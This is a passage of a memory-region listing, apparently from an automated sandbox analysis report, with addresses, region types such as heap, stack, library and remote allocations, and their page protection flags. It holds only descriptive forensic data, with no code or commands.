page execute and read and write
|
||
|
46C8000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
4EFF000
|
stack
|
page read and write
|
||
|
20D06B1E000
|
heap
|
page read and write
|
||
|
8B50000
|
heap
|
page read and write
|
||
|
245EE000
|
stack
|
page read and write
|
||
|
246AD000
|
stack
|
page read and write
|
||
|
7C20000
|
remote allocation
|
page execute and read and write
|
||
|
8BF4000
|
heap
|
page read and write
|
||
|
8AB0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
365C000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
1002A0D000
|
stack
|
page read and write
|
||
|
2C38000
|
heap
|
page read and write
|
||
|
24B89000
|
heap
|
page read and write
|
||
|
1BEF5B17000
|
heap
|
page read and write
|
||
|
498F000
|
stack
|
page read and write
|
||
|
349F000
|
unkown
|
page read and write
|
||
|
1BEDBABE000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
20D085C6000
|
heap
|
page read and write
|
||
|
1BEF5B59000
|
heap
|
page read and write
|
||
|
8840000
|
heap
|
page read and write
|
||
|
1BEF5D6C000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2712000
|
stack
|
page read and write
|
||
|
20D0858A000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
5420000
|
remote allocation
|
page execute and read and write
|
||
|
46D8000
|
heap
|
page read and write
|
||
|
474F000
|
heap
|
page read and write
|
||
|
5AA1000
|
trusted library allocation
|
page read and write
|
||
|
6EEB000
|
stack
|
page read and write
|
||
|
6F40000
|
heap
|
page execute and read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
773D000
|
stack
|
page read and write
|
||
|
8BF2000
|
heap
|
page read and write
|
||
|
1BEF5AF2000
|
heap
|
page read and write
|
||
|
1001FBB000
|
stack
|
page read and write
|
||
|
1001AFE000
|
stack
|
page read and write
|
||
|
2442C000
|
stack
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
20D06DBB000
|
heap
|
page read and write
|
||
|
1E196FE000
|
stack
|
page read and write
|
||
|
1BEDBA70000
|
heap
|
page read and write
|
||
|
8BF6000
|
heap
|
page read and write
|
||
|
348C000
|
heap
|
page read and write
|
||
|
1BEDBAC0000
|
heap
|
page read and write
|
||
|
23F30000
|
heap
|
page read and write
|
||
|
23B30000
|
direct allocation
|
page read and write
|
||
|
2A28000
|
heap
|
page read and write
|
||
|
2D29000
|
heap
|
page read and write
|
||
|
7FFD9BB3A000
|
trusted library allocation
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
46DE000
|
heap
|
page read and write
|
||
|
4CB8000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
46D2000
|
heap
|
page read and write
|
||
|
7F9B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BF6000
|
heap
|
page read and write
|
||
|
470F000
|
heap
|
page read and write
|
||
|
20D0859B000
|
heap
|
page read and write
|
||
|
8C26000
|
heap
|
page read and write
|
||
|
29DE000
|
stack
|
page read and write
|
||
|
4CB9000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
23F0D000
|
stack
|
page read and write
|
||
|
8C13000
|
heap
|
page read and write
|
||
|
20D06BBC000
|
heap
|
page read and write
|
||
|
474B000
|
heap
|
page read and write
|
||
|
DD000
|
stack
|
page read and write
|
||
|
1BEDF510000
|
trusted library allocation
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
1BEDBAD6000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
8BF2000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page readonly
|
||
|
20D06BAA000
|
heap
|
page read and write
|
||
|
2DAD000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
20D06B8F000
|
heap
|
page read and write
|
||
|
1BEDDD04000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
8810000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEDBAB6000
|
heap
|
page read and write
|
||
|
1BEF5BE0000
|
heap
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
28A0000
|
heap
|
page read and write
|
||
|
27DE000
|
stack
|
page read and write
|
||
|
20D06B20000
|
heap
|
page read and write
|
||
|
A500000
|
direct allocation
|
page execute and read and write
|
||
|
20D085A4000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
20D06B43000
|
heap
|
page read and write
|
||
|
20D0858A000
|
heap
|
page read and write
|
||
|
46C6000
|
heap
|
page read and write
|
||
|
4020000
|
remote allocation
|
page execute and read and write
|
||
|
1001EBE000
|
stack
|
page read and write
|
||
|
1BEED781000
|
trusted library allocation
|
page read and write
|
||
|
20D06BB0000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
CD00000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
|
56C3AFF000
|
unkown
|
page read and write
|
||
|
2EB5000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A80000
|
direct allocation
|
page read and write
|
||
|
2E50000
|
trusted library allocation
|
page read and write
|
||
|
8880000
|
direct allocation
|
page read and write
|
||
|
472E000
|
heap
|
page read and write
|
||
|
1BEDF618000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page read and write
|
||
|
8A60000
|
direct allocation
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
20D06BB1000
|
heap
|
page read and write
|
||
|
20D06BCB000
|
heap
|
page read and write
|
||
|
21B81920000
|
heap
|
page read and write
|
||
|
1BEF5CE0000
|
heap
|
page read and write
|
||
|
338B000
|
heap
|
page read and write
|
||
|
708E000
|
stack
|
page read and write
|
||
|
24B10000
|
heap
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
46DC000
|
heap
|
page read and write
|
||
|
2A3A000
|
heap
|
page read and write
|
||
|
25FC000
|
stack
|
page read and write
|
||
|
4CB8000
|
heap
|
page read and write
|
||
|
1BEDD390000
|
heap
|
page read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
8B00000
|
direct allocation
|
page read and write
|
||
|
20D08B92000
|
heap
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
21B81925000
|
heap
|
page read and write
|
||
|
46D4000
|
heap
|
page read and write
|
||
|
1BEF5BD7000
|
heap
|
page execute and read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
20D06BB9000
|
heap
|
page read and write
|
||
|
46E9000
|
heap
|
page read and write
|
||
|
474F000
|
heap
|
page read and write
|
||
|
20D08B7C000
|
heap
|
page read and write
|
||
|
1BEDDF13000
|
trusted library allocation
|
page read and write
|
||
|
8890000
|
direct allocation
|
page read and write
|
||
|
20D08586000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
2C1F000
|
stack
|
page read and write
|
||
|
46E8000
|
heap
|
page read and write
|
||
|
20D06BA7000
|
heap
|
page read and write
|
||
|
26F6000
|
stack
|
page read and write
|
||
|
2FB2000
|
heap
|
page read and write
|
||
|
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4CB3000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
88C0000
|
direct allocation
|
page read and write
|
||
|
20D06BB2000
|
heap
|
page read and write
|
||
|
4747000
|
heap
|
page read and write
|
||
|
30A9000
|
stack
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
1E19BFD000
|
stack
|
page read and write
|
||
|
1BEDF6E7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B99B000
|
trusted library allocation
|
page read and write
|
||
|
46D7000
|
heap
|
page read and write
|
||
|
7110000
|
heap
|
page read and write
|
||
|
84DC000
|
stack
|
page read and write
|
||
|
5AC9000
|
trusted library allocation
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
46D2000
|
heap
|
page read and write
|
||
|
20D06B51000
|
heap
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
1BEDBABC000
|
heap
|
page read and write
|
||
|
2FB5000
|
heap
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
20D06DBA000
|
heap
|
page read and write
|
||
|
1BEDD761000
|
trusted library allocation
|
page read and write
|
||
|
1BEF5B32000
|
heap
|
page read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
4CB1000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
2790000
|
heap
|
page readonly
|
||
|
46EB000
|
heap
|
page read and write
|
||
|
20D08584000
|
heap
|
page read and write
|
||
|
1BEDBA88000
|
heap
|
page read and write
|
||
|
316B000
|
heap
|
page read and write
|
||
|
88E0000
|
direct allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
1BEEDA49000
|
trusted library allocation
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
74A2000
|
heap
|
page read and write
|
||
|
1BEDDF51000
|
trusted library allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
31B2000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
2498A000
|
heap
|
page read and write
|
||
|
7120000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
2E50000
|
trusted library section
|
page read and write
|
||
|
1BEDDC2E000
|
trusted library allocation
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
20D08598000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
20D06B88000
|
heap
|
page read and write
|
||
|
20D08690000
|
heap
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
8A70000
|
direct allocation
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
8870000
|
direct allocation
|
page read and write
|
||
|
474B000
|
heap
|
page read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
8850000
|
direct allocation
|
page read and write
|
||
|
46D3000
|
heap
|
page read and write
|
||
|
1BEF5D44000
|
heap
|
page read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
21B818E0000
|
heap
|
page read and write
|
||
|
5376000
|
trusted library allocation
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
2452B000
|
stack
|
page read and write
|
||
|
20D06B88000
|
heap
|
page read and write
|
||
|
20D06BB1000
|
heap
|
page read and write
|
||
|
46C5000
|
heap
|
page read and write
|
||
|
1BEDD5BA000
|
heap
|
page read and write
|
||
|
8AD0000
|
direct allocation
|
page read and write
|
||
|
20D0858C000
|
heap
|
page read and write
|
||
|
46D1000
|
heap
|
page read and write
|
||
|
46C6000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
8C13000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
100197C000
|
stack
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
21B81950000
|
heap
|
page read and write
|
||
|
8571000
|
heap
|
page read and write
|
||
|
75A8000
|
trusted library allocation
|
page read and write
|
||
|
20D06B88000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
2498A000
|
heap
|
page read and write
|
||
|
24911000
|
heap
|
page read and write
|
||
|
D700000
|
direct allocation
|
page execute and read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
1E198FE000
|
stack
|
page read and write
|
||
|
73E7000
|
heap
|
page read and write
|
||
|
4CB9000
|
heap
|
page read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
24F83000
|
unclassified section
|
page execute and read and write
|
||
|
2466E000
|
stack
|
page read and write
|
||
|
46D1000
|
heap
|
page read and write
|
||
|
1BEDDF3F000
|
trusted library allocation
|
page read and write
|
||
|
2DCD000
|
stack
|
page read and write
|
||
|
24B11000
|
heap
|
page read and write
|
||
|
4AA1000
|
trusted library allocation
|
page read and write
|
||
|
20D06BA9000
|
heap
|
page read and write
|
||
|
8B40000
|
heap
|
page read and write
|
||
|
24F90000
|
unclassified section
|
page execute and read and write
|
||
|
82EF000
|
stack
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
30FC000
|
stack
|
page read and write
|
||
|
20D0858A000
|
heap
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEDDF8C000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
8B47000
|
heap
|
page read and write
|
||
|
1BEDDF60000
|
trusted library allocation
|
page read and write
|
||
|
730F000
|
stack
|
page read and write
|
||
|
31F0000
|
heap
|
page readonly
|
||
|
1BEDD460000
|
trusted library allocation
|
page read and write
|
||
|
324E000
|
unkown
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7478000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
4CB8000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
2DA3000
|
heap
|
page read and write
|
||
|
4BF8000
|
trusted library allocation
|
page read and write
|
||
|
8BF2000
|
heap
|
page read and write
|
||
|
8BF2000
|
heap
|
page read and write
|
||
|
243AF000
|
stack
|
page read and write
|
||
|
1BEED770000
|
trusted library allocation
|
page read and write
|
||
|
46DC000
|
heap
|
page read and write
|
||
|
20D06B98000
|
heap
|
page read and write
|
||
|
46D1000
|
heap
|
page read and write
|
||
|
4CB3000
|
heap
|
page read and write
|
||
|
82AD000
|
stack
|
page read and write
|
||
|
4AE4000
|
heap
|
page read and write
|
||
|
367F000
|
stack
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page execute and read and write
|
||
|
8860000
|
direct allocation
|
page read and write
|
||
|
1BEF5CFF000
|
heap
|
page read and write
|
||
|
8840000
|
direct allocation
|
page read and write
|
||
|
4A8F000
|
stack
|
page read and write
|
||
|
1BEDBB90000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
20D06BB9000
|
heap
|
page read and write
|
||
|
849C000
|
stack
|
page read and write
|
||
|
1BEDDBD4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1BEDD3F0000
|
heap
|
page readonly
|
||
|
73EC000
|
heap
|
page read and write
|
||
|
20D0858B000
|
heap
|
page read and write
|
||
|
328E000
|
stack
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
2F1D000
|
heap
|
page read and write
|
||
|
851D000
|
stack
|
page read and write
|
||
|
20D085A0000
|
heap
|
page read and write
|
||
|
1BEF5F90000
|
heap
|
page read and write
|
||
|
8BF1000
|
heap
|
page read and write
|
||
|
20D0858A000
|
heap
|
page read and write
|
||
|
4CB6000
|
heap
|
page read and write
|
||
|
21B8195D000
|
heap
|
page read and write
|
||
|
1BEDB990000
|
heap
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
4A98000
|
heap
|
page read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
339E000
|
unkown
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
24290000
|
direct allocation
|
page read and write
|
||
|
46D0000
|
heap
|
page read and write
|
||
|
8B30000
|
direct allocation
|
page read and write
|
||
|
20D06BA2000
|
heap
|
page read and write
|
||
|
8B58000
|
heap
|
page read and write
|
||
|
4A5E000
|
stack
|
page read and write
|
||
|
46C6000
|
heap
|
page read and write
|
||
|
20D06B8C000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
2E2F000
|
stack
|
page read and write
|
||
|
24730000
|
unclassified section
|
page execute and read and write
|
||
|
24910000
|
heap
|
page read and write
|
||
|
20D085C6000
|
heap
|
page read and write
|
||
|
1E19DFF000
|
stack
|
page read and write
|
||
|
1BEDD987000
|
trusted library allocation
|
page read and write
|
||
|
855C000
|
stack
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
4BBD000
|
heap
|
page read and write
|
||
|
24BBA000
|
heap
|
page read and write
|
||
|
8910000
|
direct allocation
|
page read and write
|
||
|
20D06DBA000
|
heap
|
page read and write
|
||
|
270F000
|
stack
|
page read and write
|
||
|
8BFA000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
20D085C6000
|
heap
|
page read and write
|
||
|
1001F3E000
|
stack
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
5CF000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2DFD000
|
stack
|
page read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
20D06A50000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
24888000
|
heap
|
page read and write
|
||
|
46CC000
|
heap
|
page read and write
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
4747000
|
heap
|
page read and write
|
||
|
1BEF5C00000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D08590000
|
heap
|
page read and write
|
||
|
20D06BCB000
|
heap
|
page read and write
|
||
|
1001A7E000
|
stack
|
page read and write
|
||
|
8B77000
|
heap
|
page read and write
|
||
|
46EB000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
46C8000
|
heap
|
page read and write
|
||
|
2F9C000
|
heap
|
page read and write
|
||
|
33DE000
|
stack
|
page read and write
|
||
|
1BEF5D8C000
|
heap
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
20D06B9C000
|
heap
|
page read and write
|
||
|
1001563000
|
stack
|
page read and write
|
||
|
6F45000
|
heap
|
page execute and read and write
|
||
|
1BEDDF25000
|
trusted library allocation
|
page read and write
|
||
|
1BEDF63A000
|
trusted library allocation
|
page read and write
|
||
|
20D06DBE000
|
heap
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
2436E000
|
stack
|
page read and write
|
||
|
20D08593000
|
heap
|
page read and write
|
||
|
20D06B2E000
|
heap
|
page read and write
|
||
|
25010000
|
heap
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
1BEDD400000
|
trusted library allocation
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
20D06BAF000
|
heap
|
page read and write
|
||
|
46D2000
|
heap
|
page read and write
|
||
|
23B00000
|
direct allocation
|
page read and write
|
||
|
20D06BCB000
|
heap
|
page read and write
|
||
|
46C6000
|
heap
|
page read and write
|
||
|
2C3C000
|
stack
|
page read and write
|
||
|
20D08581000
|
heap
|
page read and write
|
||
|
46C1000
|
heap
|
page read and write
|
||
|
1BEF5D19000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
46A0000
|
heap
|
page read and write
|
||
|
8BE2000
|
heap
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
46D0000
|
heap
|
page read and write
|
||
|
2E8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
46ED000
|
heap
|
page read and write
|
||
|
1BEDE98C000
|
trusted library allocation
|
page read and write
|
||
|
8BF4000
|
heap
|
page read and write
|
||
|
24760000
|
direct allocation
|
page read and write
|
||
|
20D0858C000
|
heap
|
page read and write
|
||
|
10018FE000
|
stack
|
page read and write
|
||
|
3653000
|
heap
|
page read and write
|
||
|
1BEDBAFD000
|
heap
|
page read and write
|
||
|
2FAF000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
AAF7000
|
trusted library allocation
|
page read and write
|
||
|
2EAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
24260000
|
direct allocation
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
295C000
|
stack
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page read and write
|
||
|
4731000
|
heap
|
page read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
24F10000
|
unclassified section
|
page execute and read and write
|
||
|
46D2000
|
heap
|
page read and write
|
||
|
8AE0000
|
direct allocation
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FEC000
|
unclassified section
|
page execute and read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
2714000
|
stack
|
page read and write
|
||
|
4AFB000
|
trusted library allocation
|
page read and write
|
||
|
1BEDD7E5000
|
trusted library allocation
|
page read and write
|
||
|
180000
|
heap
|
page read and write
|
||
|
786B000
|
stack
|
page read and write
|
||
|
20D06BD8000
|
heap
|
page read and write
|
||
|
2DED000
|
stack
|
page read and write
|
||
|
1BEDBABA000
|
heap
|
page read and write
|
||
|
6E8000
|
heap
|
page read and write
|
||
|
339F000
|
stack
|
page read and write
|
||
|
8A90000
|
direct allocation
|
page read and write
|
||
|
23B10000
|
direct allocation
|
page read and write
|
||
|
24BE9000
|
heap
|
page read and write
|
||
|
2E60000
|
trusted library section
|
page read and write
|
||
|
299D000
|
stack
|
page read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
46DE000
|
heap
|
page read and write
|
||
|
2D7E000
|
stack
|
page read and write
|
||
|
24C19000
|
heap
|
page read and write
|
||
|
73D7000
|
heap
|
page read and write
|
||
|
4EB0000
|
trusted library allocation
|
page read and write
|
||
|
20D06B1F000
|
heap
|
page read and write
|
||
|
1BEF5B89000
|
heap
|
page read and write
|
||
|
1E199FE000
|
stack
|
page read and write
|
||
|
2EFA000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page readonly
|
||
|
2A4F000
|
heap
|
page read and write
|
||
|
1BEF5B6B000
|
heap
|
page read and write
|
||
|
24F6D000
|
unclassified section
|
page execute and read and write
|
||
|
46E3000
|
heap
|
page read and write
|
||
|
4890000
|
heap
|
page read and write
|
||
|
319C000
|
heap
|
page read and write
|
||
|
2446C000
|
stack
|
page read and write
|
||
|
1E19CFE000
|
stack
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
8BA8000
|
heap
|
page read and write
|
||
|
20D06DBE000
|
heap
|
page read and write
|
||
|
1BEDD3E0000
|
trusted library allocation
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
244EF000
|
stack
|
page read and write
|
||
|
20D0858A000
|
heap
|
page read and write
|
||
|
357F000
|
unkown
|
page read and write
|
||
|
24761000
|
direct allocation
|
page execute and read and write
|
||
|
73C7000
|
heap
|
page read and write
|
||
|
20D06DBC000
|
heap
|
page read and write
|
||
|
46D4000
|
heap
|
page read and write
|
||
|
88B0000
|
direct allocation
|
page read and write
|
||
|
72CE000
|
stack
|
page read and write
|
||
|
2EF8000
|
trusted library allocation
|
page read and write
|
||
|
1BEF5D7A000
|
heap
|
page read and write
|
||
|
2EA0000
|
trusted library allocation
|
page read and write
|
||
|
2A4F000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
C300000
|
direct allocation
|
page execute and read and write
|
||
|
20D085C6000
|
heap
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
2417E000
|
stack
|
page read and write
|
||
|
24A02000
|
heap
|
page read and write
|
||
|
9100000
|
direct allocation
|
page execute and read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
20D0858A000
|
heap
|
page read and write
|
||
|
58E000
|
stack
|
page read and write
|
||
|
8BF2000
|
heap
|
page read and write
|
||
|
248FE000
|
heap
|
page read and write
|
||
|
27F5000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
1BEF5BD0000
|
heap
|
page execute and read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
82F0000
|
heap
|
page read and write
|
||
|
46DE000
|
heap
|
page read and write
|
||
|
1BEDBBE0000
|
heap
|
page read and write
|
||
|
3478000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
46CC000
|
heap
|
page read and write
|
||
|
46D1000
|
heap
|
page read and write
|
||
|
23FBE000
|
stack
|
page read and write
|
||
|
2E99000
|
trusted library allocation
|
page read and write
|
||
|
3650000
|
heap
|
page read and write
|
||
|
5D4B000
|
trusted library allocation
|
page read and write
|
||
|
88A0000
|
direct allocation
|
page read and write
|
||
|
2EFA000
|
heap
|
page read and write
|
||
|
1E19EFB000
|
stack
|
page read and write
|
||
|
20D08B70000
|
heap
|
page read and write
|
||
|
2CEF000
|
stack
|
page read and write
|
||
|
46DE000
|
heap
|
page read and write
|
||
|
24FE6000
|
unclassified section
|
page execute and read and write
|
||
|
1BEF5AF4000
|
heap
|
page read and write
|
||
|
2998000
|
stack
|
page read and write
|
||
|
2D6E000
|
stack
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
306C000
|
stack
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
23B20000
|
direct allocation
|
page read and write
|
||
|
470F000
|
heap
|
page read and write
|
||
|
46D1000
|
heap
|
page read and write
|
||
|
1BEDDC52000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
trusted library allocation
|
page read and write
|
||
|
7DF4409E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24811000
|
heap
|
page read and write
|
||
|
2DAF000
|
stack
|
page read and write
|
||
|
1002B0A000
|
stack
|
page read and write
|
||
|
AF00000
|
direct allocation
|
page execute and read and write
|
||
|
8C09000
|
heap
|
page read and write
|
||
|
8385000
|
trusted library allocation
|
page read and write
|
||
|
4CB1000
|
heap
|
page read and write
|
||
|
8A30000
|
heap
|
page read and write
|
||
|
20D08B7F000
|
heap
|
page read and write
|
||
|
4891000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
5AB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
20D06B88000
|
heap
|
page read and write
|
||
|
1001BBE000
|
stack
|
page read and write
|
||
|
46D9000
|
heap
|
page read and write
|
||
|
1E194FA000
|
stack
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
8BF1000
|
heap
|
page read and write
|
||
|
7390000
|
heap
|
page read and write
|
||
|
8BF6000
|
heap
|
page read and write
|
||
|
20D08581000
|
heap
|
page read and write
|
||
|
4CB4000
|
heap
|
page read and write
|
||
|
20D085A4000
|
heap
|
page read and write
|
||
|
4CB3000
|
heap
|
page read and write
|
||
|
2984000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
4CB0000
|
heap
|
page read and write
|
||
|
46CD000
|
heap
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
8BE2000
|
heap
|
page read and write
|
||
|
1BEDD3C0000
|
trusted library allocation
|
page read and write
|
||
|
20D06BB1000
|
heap
|
page read and write
|
||
|
1BEDBBE5000
|
heap
|
page read and write
|
||
|
246EE000
|
stack
|
page read and write
|
||
|
7453000
|
heap
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page execute and read and write
